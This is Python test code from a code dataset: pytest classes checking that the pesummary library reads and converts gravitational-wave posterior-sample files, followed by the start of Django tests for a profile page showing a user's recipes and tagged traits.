super(TestGWCSVFile, self).test_file_format_read(
self.path, "csv", SingleAnalysisDefault
)
class TestGWNumpyFile(GWBaseRead):
"""Class to test loading in a npy file with the core Read function
"""
def setup(self):
"""Setup the TestGWNumpyFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="npy", gw=True)
self.path = os.path.join(".outdir", "test.npy")
self.result = GWRead(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.gw.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestGWNumpyFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestGWNumpyFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestGWNumpyFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestGWNumpyFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestGWNumpyFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestGWNumpyFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestGWNumpyFile, self).test_to_dat()
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
super(TestGWNumpyFile, self).test_to_lalinference_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.gw.file.formats.default import SingleAnalysisDefault
super(TestGWNumpyFile, self).test_file_format_read(
self.path, "numpy", SingleAnalysisDefault
)
class TestGWDatFile(GWBaseRead):
"""Class to test loading in an dat file with the core Read function
"""
def setup(self):
"""Setup the TestGWDatFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="dat", gw=True)
self.path = os.path.join(".outdir", "test.dat")
self.result = GWRead(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.gw.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestGWDatFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestGWDatFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestGWDatFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestGWDatFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestGWDatFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestGWDatFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestGWDatFile, self).test_to_dat()
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
super(TestGWDatFile, self).test_to_lalinference_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.gw.file.formats.default import SingleAnalysisDefault
super(TestGWDatFile, self).test_file_format_read(
self.path, "dat", SingleAnalysisDefault
)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestGWDatFile, self).test_downsample()
class TestGWHDF5File(GWBaseRead):
"""Class to test loading in an HDF5 file with the gw Read function
"""
def setup(self):
"""Setup the TestCoreHDF5File class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="hdf5", gw=True)
self.path = os.path.join(".outdir", "test.h5")
self.result = GWRead(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.gw.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestGWHDF5File, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestGWHDF5File, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestGWHDF5File, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestGWHDF5File, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestGWHDF5File, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestGWHDF5File, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestGWHDF5File, self).test_to_dat()
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
super(TestGWHDF5File, self).test_to_lalinference_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.gw.file.formats.default import SingleAnalysisDefault
super(TestGWHDF5File, self).test_file_format_read(
self.path, "hdf5", SingleAnalysisDefault
)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestGWHDF5File, self).test_downsample()
class TestGWJsonFile(GWBaseRead):
"""Class to test loading in an json file with the gw Read function
"""
def setup(self):
"""Setup the TestGWDatFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="json", gw=True)
self.path = os.path.join(".outdir", "test.json")
self.result = GWRead(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.gw.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestGWJsonFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestGWJsonFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestGWJsonFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestGWJsonFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestGWJsonFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestGWJsonFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestGWJsonFile, self).test_to_dat()
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
super(TestGWJsonFile, self).test_to_lalinference_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.gw.file.formats.default import SingleAnalysisDefault
super(TestGWJsonFile, self).test_file_format_read(
self.path, "json", SingleAnalysisDefault
)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestGWJsonFile, self).test_downsample()
class TestGWJsonBilbyFile(GWBaseRead):
"""Class to test loading in a bilby json file with the gw Read function
"""
def setup(self):
"""Setup the TestCoreBilbyFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(
extension="json", gw=True, bilby=True)
self.path = os.path.join(".outdir", "test.json")
self.result = GWRead(self.path, disable_prior=True)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(self.result, pesummary.gw.file.formats.bilby.Bilby)
def test_parameters(self):
"""Test the parameter property of the bilby class
"""
super(TestGWJsonBilbyFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the bilby class
"""
super(TestGWJsonBilbyFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the bilby class
"""
true = [self.parameters, self.samples]
super(TestGWJsonBilbyFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
true = "bilby=0.5.3:"
super(TestGWJsonBilbyFile, self).test_version(true)
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
true = {"sampler": {
"log_bayes_factor": 0.5,
"log_noise_evidence": 0.1,
"log_evidence": 0.2,
"log_evidence_err": 0.1},
"meta_data": {"time_marginalization": True},
"other": {"likelihood": {"time_marginalization": "True"}}
}
super(TestGWJsonBilbyFile, self).test_extra_kwargs(true)
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: 1. for par in self.parameters}
super(TestGWJsonBilbyFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestGWJsonBilbyFile, self).test_to_dat()
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
super(TestGWJsonBilbyFile, self).test_to_lalinference_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.gw.file.formats.bilby import Bilby
super(TestGWJsonBilbyFile, self).test_file_format_read(self.path, "bilby", Bilby)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestGWJsonBilbyFile, self).test_downsample()
def test_priors(self, read_function=GWRead):
"""Test that the priors are correctly extracted from the bilby result
file
"""
self.result = GWRead(self.path)
assert "final_mass_source_non_evolved" not in self.result.parameters
for param, prior in self.result.priors["samples"].items():
assert isinstance(prior, np.ndarray)
assert "final_mass_source_non_evolved" in self.result.priors["samples"].keys()
f = read_function(self.path, disable_prior_conversion=True)
assert "final_mass_source_non_evolved" not in f.priors["samples"].keys()
f = read_function(self.path, disable_prior=True)
assert not len(f.priors["samples"])
f = read_function(self.path, nsamples_for_prior=200)
params = list(f.priors["samples"].keys())
assert len(f.priors["samples"][params[0]]) == 200
class TestGWLALInferenceFile(GWBaseRead):
"""Class to test loading in a LALInference file with the gw Read function
"""
def setup(self):
"""Setup the TestCoreBilbyFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(
extension="hdf5", gw=True, lalinference=True)
self.path = os.path.join(".outdir", "test.hdf5")
self.result = GWRead(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.gw.file.formats.lalinference.LALInference)
def test_parameters(self):
"""Test the parameter property of the bilby class
"""
super(TestGWLALInferenceFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the bilby class
"""
super(TestGWLALInferenceFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the bilby class
"""
true = [self.parameters, self.samples]
super(TestGWLALInferenceFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestGWLALInferenceFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
true = {"sampler": {"nsamples": 1000}, "meta_data": {}, "other": {}}
super(TestGWLALInferenceFile, self).test_extra_kwargs(true=true)
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
super(TestGWLALInferenceFile, self).test_injection_parameters(None)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestGWLALInferenceFile, self).test_to_dat()
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
super(TestGWLALInferenceFile, self).test_to_lalinference_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.gw.file.formats.lalinference import LALInference
super(TestGWLALInferenceFile, self).test_file_format_read(
self.path, "lalinference", LALInference
)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestGWLALInferenceFile, self).test_downsample()
class TestPublicPycbc(object):
"""Test that data files produced by Nitz et al.
(https://github.com/gwastro/2-ogc) can be read in correctly.
"""
def setup(self):
"""Setup the TestCoreBilbyFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def _pycbc_check(self, filename):
"""Test a public pycbc posterior samples file
Parameters
----------
filename: str
url of pycbc posterior samples file you wish to download, read and
test
"""
from pesummary.core.fetch import download_and_read_file
from pesummary.gw.file.standard_names import standard_names
import h5py
self.file = download_and_read_file(
filename, read_file=False, outdir=".outdir"
)
self.result = GWRead(self.file, path_to_samples="samples")
samples = self.result.samples_dict
fp = h5py.File(self.file, 'r')
fp_samples = fp["samples"]
for param in fp_samples.keys():
np.testing.assert_almost_equal(
fp_samples[param], samples[standard_names.get(param, param)]
)
fp.close()
def test_2_OGC(self):
"""Test the samples released as part of the 2-OGC catalog
"""
self._pycbc_check(
"https://github.com/gwastro/2-ogc/raw/master/posterior_samples/"
"H1L1V1-EXTRACT_POSTERIOR_150914_09H_50M_45UTC-0-1.hdf"
)
def test_3_OGC(self):
"""Test the samples released as part of the 3-OGC catalog
"""
self._pycbc_check(
"https://github.com/gwastro/3-ogc/raw/master/posterior/"
"GW150914_095045-PYCBC-POSTERIOR-XPHM.hdf"
)
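# Illustrative sketch of the fetch-and-read pattern used by the public-data
# tests above: download_and_read_file with read_file=False only downloads the
# file, and the returned path is handed to GWRead. The URL is the 2-OGC file
# used in test_2_OGC; _example_fetch_public_samples is a hypothetical helper.
def _example_fetch_public_samples(outdir=".outdir"):
    from pesummary.core.fetch import download_and_read_file
    url = (
        "https://github.com/gwastro/2-ogc/raw/master/posterior_samples/"
        "H1L1V1-EXTRACT_POSTERIOR_150914_09H_50M_45UTC-0-1.hdf"
    )
    path = download_and_read_file(url, read_file=False, outdir=outdir)
    return GWRead(path, path_to_samples="samples").samples_dict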
class TestPublicPrincetonO1O2(object):
"""Test that data files produced by Venumadhav et al.
(https://github.com/jroulet/O2_samples) can be read in correctly
"""
def setup(self):
"""Setup the TestCoreBilbyFile class
"""
from pesummary.core.fetch import download_and_read_file
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.file = download_and_read_file(
"https://github.com/jroulet/O2_samples/raw/master/GW150914.npy",
read_file=False, outdir=".outdir"
)
self.result = GWRead(self.file, file_format="princeton")
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_samples_dict(self):
"""
"""
data = np.load(self.file)
samples = self.result.samples_dict
map = {
"mchirp": "chirp_mass", "eta": "symmetric_mass_ratio",
"s1z": "spin_1z", "s2z": "spin_2z", "RA": "ra", "DEC": "dec",
"psi": "psi", "iota": "iota", "vphi": "phase", "tc": "geocent_time",
"DL": "luminosity_distance"
}
columns = [
'mchirp', 'eta', 's1z', 's2z', 'RA', 'DEC', 'psi', 'iota', 'vphi',
'tc', 'DL'
]
for num, param in enumerate(columns):
np.testing.assert_almost_equal(data.T[num], samples[map[param]])
class TestMultiAnalysis(object):
"""Class to test that a file which contains multiple analyses can be read
in appropriately
"""
def setup(self):
"""Setup the TestMultiAnalysis class
"""
from pesummary.utils.samples_dict import MultiAnalysisSamplesDict
from pesummary.io import write
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.data = MultiAnalysisSamplesDict(
{"label1": {
"mass_1": np.random.uniform(20, 100, 10),
"mass_2": np.random.uniform(5, 20, 10),
}, "label2": {
"mass_1": np.random.uniform(20, 100, 10),
"mass_2": np.random.uniform(5, 20, 10)
}}
)
write(
self.data, file_format="sql", filename="multi_analysis.db",
outdir=".outdir", overwrite=True, delete_existing=True
)
self.result = read(
os.path.join(".outdir", "multi_analysis.db"),
add_zero_likelihood=False, remove_row_column="ROW"
)
self.samples_dict = self.result.samples_dict
def teardown(self):
"""Remove all files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_multi_analysis_db(self):
"""Test that an sql database with more than one set of samples can
be read in appropriately
"""
assert sorted(self.samples_dict.keys()) == sorted(self.data.keys())
for key in self.samples_dict.keys():
assert sorted(self.samples_dict[key].keys()) == sorted(
self.data[key].keys()
)
for param in self.samples_dict[key].keys():
np.testing.assert_almost_equal(
self.samples_dict[key][param], self.data[key][param]
)
self.result.generate_all_posterior_samples()
self.samples_dict = self.result.samples_dict
for key in self.samples_dict.keys():
assert "total_mass" in self.samples_dict[key].keys()
np.testing.assert_almost_equal(
self.data[key]["mass_1"] + self.data[key]["mass_2"],
self.samples_dict[key]["total_mass"]
)
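# Illustrative sketch of the derived-parameter generation checked above: after
# generate_all_posterior_samples() is called, derived quantities such as
# total_mass are added to every analysis in samples_dict. The database path,
# keyword values and _example_generate_derived name are placeholders that
# mirror the setup of this class.
def _example_generate_derived(path=".outdir/multi_analysis.db"):
    result = read(path, add_zero_likelihood=False, remove_row_column="ROW")
    result.generate_all_posterior_samples()
    return {
        label: result.samples_dict[label]["total_mass"]
        for label in result.samples_dict.keys()
    }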
class TestSingleAnalysisChangeFormat(object):
"""Test that when changing file format through the 'write' method, the
samples are conserved
"""
def setup(self):
"""Setup the TestChangeFormat class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters = ["log_likelihood", "mass_1", "mass_2"]
self.samples = np.array(
[
np.random.uniform(20, 100, 1000),
np.random.uniform(5, 10, 1000), np.random.uniform(0, 1, 1000)
]
).T
write(
self.parameters, self.samples, outdir=".outdir", filename="test.dat",
overwrite=True
)
self.result = read(os.path.join(".outdir", "test.dat"))
def teardown(self):
"""Remove all files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def save_and_check(
self, file_format, bilby=False, pesummary=False, lalinference=False
):
"""Save the result file and check the contents
"""
if bilby:
filename = "test_bilby.json"
elif pesummary or lalinference:
filename = "test_pesummary.h5"
else:
filename = "test.{}".format(file_format)
self.result.write(
file_format=file_format, outdir=".outdir", filename=filename
)
result = read(os.path.join(".outdir", filename), disable_prior=True)
if pesummary:
assert result.parameters[0] == self.parameters
np.testing.assert_almost_equal(result.samples[0], self.samples)
else:
original = result.parameters
sorted_params = sorted(result.parameters)
idxs = [original.index(i) for i in sorted_params]
assert sorted(result.parameters) == self.parameters
np.testing.assert_almost_equal(
np.array(result.samples)[:, idxs], self.samples
)
def test_to_bilby(self):
"""Test saving to bilby format
"""
self.save_and_check("bilby", bilby=True)
def test_to_hdf5(self):
"""Test saving to hdf5
"""
self.save_and_check("hdf5")
def test_to_json(self):
"""Test saving to json
"""
self.save_and_check("json")
def test_to_sql(self):
"""Test saving to sql
"""
self.save_and_check("sql")
def test_to_pesummary(self):
self.save_and_check("pesummary", pesummary=True)
def test_to_lalinference(self):
self.save_and_check("lalinference", lalinference=True)
class TestMultipleAnalysisChangeFormat(object):
"""Test that when changing file format through the 'write' method, the
samples are conserved
"""
def setup(self):
"""Setup the TestMultiplAnalysisChangeFormat class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters = [
["log_likelihood", "mass_1", "mass_2"],
["chirp_mass", "log_likelihood", "total_mass"]
]
self.samples = np.array(
[np.array(
[
np.random.uniform(20, 100, 1000),
np.random.uniform(5, 10, 1000),
np.random.uniform(0, 1, 1000)
]
).T, np.array(
[
np.random.uniform(20, 100, 1000),
np.random.uniform(5, 10, 1000),
np.random.uniform(0, 1, 1000)
]
).T]
)
write(
self.parameters, self.samples, outdir=".outdir", filename="test.db",
overwrite=True, file_format="sql"
)
self.result = read(os.path.join(".outdir", "test.db"))
def teardown(self):
"""Remove all files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def save_and_check(
self, file_format, bilby=False, pesummary=False, lalinference=False,
multiple_files=True
):
"""Save the result file and check the contents
"""
if bilby:
filename = "test_bilby.json"
elif pesummary or lalinference:
filename = "test_pesummary.h5"
else:
filename = "test.{}".format(file_format)
self.result.write(
file_format=file_format, outdir=".outdir", filename=filename
)
if multiple_files:
files = sorted(glob.glob(".outdir/{}_*.{}".format(*filename.split("."))))
assert len(files) == 2
for num, _file in enumerate(files):
result = read(_file, disable_prior=True)
original = result.parameters
sorted_params = sorted(result.parameters)
idxs = [original.index(i) for i in sorted_params]
assert sorted(result.parameters) == self.parameters[num]
np.testing.assert_almost_equal(
np.array(result.samples)[:, idxs], self.samples[num]
)
else:
result = read(os.path.join(".outdir", filename), disable_prior=True)
original = result.parameters
sorted_params = sorted(result.parameters)
idxs = [original.index(i) for i in sorted_params]
for ii in range(len(original)):
assert result.parameters[ii] == self.parameters[ii]
np.testing.assert_almost_equal(
np.array(result.samples), self.samples
)
def test_to_bilby(self):
"""Test saving to bilby
"""
self.save_and_check("bilby", bilby=True)
def test_to_dat(self):
"""Test saving to dat
"""
self.save_and_check("dat")
def test_to_hdf5(self):
"""Test saving to hdf5
"""
self.save_and_check("hdf5")
def test_to_json(self):
"""Test saving to json
"""
self.save_and_check("json")
def test_to_sql(self):
"""Test saving to sql
"""
self.save_and_check("sql", multiple_files=False)
def test_to_pesummary(self):
self.save_and_check("pesummary", pesummary=True, multiple_files=False)
def test_to_lalinference(self):
self.save_and_check("lalinference", lalinference=True)
def test_add_log_likelihood():
"""Test that zero log likelihood samples are added when the posterior table
does not include likelihood samples
"""
from pesummary.utils.samples_dict import MultiAnalysisSamplesDict
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
parameters = ["a", "b"]
samples = np.array([
np.random.uniform(5, 10, 1000), np.random.uniform(5, 10, 1000)
]).T
write(parameters, samples, filename="test.dat", outdir=".outdir")
f = read(".outdir/test.dat")
_samples_dict = f.samples_dict
assert sorted(f.parameters) == ["a", "b", "log_likelihood"]
np.testing.assert_almost_equal(
_samples_dict["log_likelihood"], np.zeros(1000)
)
np.testing.assert_almost_equal(_samples_dict["a"], samples.T[0])
np.testing.assert_almost_equal(_samples_dict["b"], samples.T[1])
parameters = [["a", "b"], ["c", "d"]]
samples = [
np.array([np.random.uniform(1, 5, 1000), np.random.uniform(1, 2, 1000)]).T,
np.array([np.random.uniform(1, 5, 1000), np.random.uniform(1, 2, 1000)]).T
]
data = MultiAnalysisSamplesDict({
"one": {
"a": np.random.uniform(1, 5, 1000), "b": np.random.uniform(1, 2, 1000)
}, "two": {
"c": np.random.uniform(1, 5, 1000), "d": np.random.uniform(1, 2, 1000)
}
})
write(
data, file_format="pesummary", filename="multi.h5", outdir=".outdir",
)
f = read(".outdir/multi.h5")
_samples_dict = f.samples_dict
np.testing.assert_almost_equal(
_samples_dict["one"]["log_likelihood"], np.zeros(1000)
)
np.testing.assert_almost_equal(
_samples_dict["two"]["log_likelihood"], np.zeros(1000)
)
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
| 34.95333
| 109
| 0.61916
| 8,459
| 71,899
| 5.11538
| 0.044804
| 0.068406
| 0.04042
| 0.029581
| 0.85503
| 0.819047
| 0.784174
| 0.753854
| 0.7325
| 0.692265
| 0
| 0.009106
| 0.27145
| 71,899
| 2,056
| 110
| 34.970331
| 0.81696
| 0.230059
| 0
| 0.533921
| 0
| 0
| 0.061045
| 0.004992
| 0
| 0
| 0
| 0
| 0.078414
| 1
| 0.235242
| false
| 0.004405
| 0.029956
| 0
| 0.287225
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff1ee76b5c410dc1feaf6afdab86093b52eeaa4a
| 31,630
|
py
|
Python
|
profiles/test_views.py
|
UW-GAC/pie
|
89ae277f5ba1357580d78c3527f26200686308a6
|
[
"MIT"
] | null | null | null |
profiles/test_views.py
|
UW-GAC/pie
|
89ae277f5ba1357580d78c3527f26200686308a6
|
[
"MIT"
] | 3
|
2020-01-02T20:17:06.000Z
|
2020-01-04T21:13:09.000Z
|
profiles/test_views.py
|
UW-GAC/pie
|
89ae277f5ba1357580d78c3527f26200686308a6
|
[
"MIT"
] | 1
|
2021-10-29T22:15:27.000Z
|
2021-10-29T22:15:27.000Z
|
"""Test the functions and classes for views.py."""
from django.urls import reverse
from core.utils import (DCCAnalystLoginTestCase, LoginRequiredTestCase, RecipeSubmitterLoginTestCase,
PhenotypeTaggerLoginTestCase, UserLoginTestCase)
from recipes.factories import HarmonizationRecipeFactory, UnitRecipeFactory
from tags.factories import DCCReviewFactory, TaggedTraitFactory
from tags.models import DCCReview, TaggedTrait
from trait_browser.factories import StudyFactory
class ProfileTest(UserLoginTestCase):
def setUp(self):
super(ProfileTest, self).setUp()
def get_url(self, *args):
return reverse('profiles:profile')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url())
context = response.context
self.assertFalse(context['show_tabs'])
self.assertFalse(context['show_recipes'])
self.assertFalse(context['show_my_tagged'])
self.assertFalse(context['show_study_tagged'])
self.assertNotIn('unit_recipe_table', context)
self.assertNotIn('harmonization_recipe_table', context)
self.assertNotIn('user_taggedtraits', context)
self.assertNotIn('study_taggedtrait_counts', context)
self.assertEqual(context['user'], self.user)
def test_no_tagged_phenotypes(self):
"""Regular user does not see My Tagged Phenotypes."""
response = self.client.get(self.get_url())
context = response.context
self.assertNotContains(response, 'id="user_tagged_phenotypes"')
self.assertNotContains(response, 'id="study_tagged_phenotypes"')
def test_no_recipes(self):
"""Regular user does not see any recipes."""
response = self.client.get(self.get_url())
context = response.context
self.assertFalse(context['show_recipes'])
self.assertNotContains(response, 'id="unitrecipes"')
self.assertNotContains(response, 'id="harmonizationrecipes"')
class DCCAnalystLoginTestCaseProfileTest(DCCAnalystLoginTestCase):
def setUp(self):
super(DCCAnalystLoginTestCaseProfileTest, self).setUp()
def get_url(self, *args):
return reverse('profiles:profile')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url())
context = response.context
self.assertTrue(context['show_tabs'])
self.assertTrue(context['show_recipes'])
self.assertTrue(context['show_my_tagged'])
self.assertFalse(context['show_study_tagged'])
self.assertIn('unit_recipe_table', context)
self.assertEqual(len(context['unit_recipe_table'].rows), 0)
self.assertIn('harmonization_recipe_table', context)
self.assertEqual(len(context['harmonization_recipe_table'].rows), 0)
self.assertIn('user_taggedtraits', context)
self.assertEqual(len(context['user_taggedtraits']), 0)
self.assertNotIn('study_taggedtrait_counts', context)
def test_has_correct_tagged_phenotypes_tabs(self):
"""Staff user does see My Tagged Phenotypes, but not study tagged phenotypes."""
response = self.client.get(self.get_url())
context = response.context
self.assertContains(response, 'id="user_tagged_phenotypes"')
self.assertNotContains(response, 'id="study_tagged_phenotypes"')
def test_has_recipes_tabs(self):
"""Staff user does see any recipes."""
response = self.client.get(self.get_url())
context = response.context
self.assertTrue(context['show_recipes'])
self.assertContains(response, 'id="unitrecipes"')
self.assertContains(response, 'id="harmonizationrecipes"')
def test_has_correct_recipe_count(self):
"""Tables of recipes have the correct number of rows for this user."""
unit_recipes = UnitRecipeFactory.create_batch(10, creator=self.user)
harmonization_recipes = HarmonizationRecipeFactory.create_batch(10, creator=self.user)
other_unit_recipe = UnitRecipeFactory.create()
other_harmonization_recipe = HarmonizationRecipeFactory.create()
response = self.client.get(self.get_url())
context = response.context
self.assertNotIn(other_unit_recipe, context['unit_recipe_table'].data)
self.assertNotIn(other_harmonization_recipe, context['harmonization_recipe_table'].data)
self.assertEqual(len(context['unit_recipe_table'].rows), len(unit_recipes))
self.assertEqual(len(context['harmonization_recipe_table'].rows), len(harmonization_recipes))
def test_my_tagged_variables_correct_empty(self):
"""The list of 'my tagged traits' is correct when the user has no taggedtraits."""
response = self.client.get(self.get_url())
context = response.context
self.assertEqual(context['user_taggedtraits'], [])
def test_my_tagged_variables_correct_count(self):
"""The list of 'my tagged traits' has the correct count of taggedtraits."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
expected_pks = list(TaggedTrait.objects.non_archived().filter(creator=self.user).values_list('pk', flat=True))
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_my_tagged_variables_correct_count_with_archived_tagged_trait(self):
"""The list of 'my tagged traits' has the correct count of taggedtraits when there is one archived."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
archived_tagged_trait = TaggedTraitFactory.create(
trait__source_dataset__source_study_version__study=study, creator=self.user, archived=True)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
